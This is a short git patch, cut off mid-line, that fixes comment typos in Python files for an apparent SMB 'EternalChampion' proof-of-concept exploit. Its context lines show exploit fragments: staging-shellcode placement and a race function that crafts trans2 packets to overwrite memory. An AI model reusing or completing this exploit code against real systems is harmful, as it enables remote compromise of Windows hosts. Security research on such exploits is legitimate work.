From acaa27cc801f7b78648a776d8cb8ab57546bd37e Mon Sep 17 00:00:00 2001 From: worawit Date: Thu, 22 Jun 2017 22:16:20 +0700 Subject: [PATCH] typo and some comment --- eternalchampion_poc2.py | 4 ++-- zzz_exploit.py | 6 ++++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/eternalchampion_poc2.py b/eternalchampion_poc2.py index 1d24f53..010f7b4 100644 --- a/eternalchampion_poc2.py +++ b/eternalchampion_poc2.py @@ -24,7 +24,7 @@ target = sys.argv[1] pipe_name = sys.argv[2] # this one must do something to restore execution -# Note: when stagine shellcode is executed, CONNECTION+0x3d0 is at top of stack +# Note: when staging shellcode is executed, CONNECTION+0x3d0 is at top of stack staging_sc = '\xcc'*128 def login_put_staging_sc(conn, staging_sc, maxBufferSize): @@ -111,7 +111,7 @@ def nsa_race(conn, jmp_addr): mid = conn.next_mid() # we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid) - # chnage infoLevel to SMB_INFO_IS_NAME_VALID + # change infoLevel to SMB_INFO_IS_NAME_VALID req2 = conn.create_trans2_secondary_packet(mid, param=pack('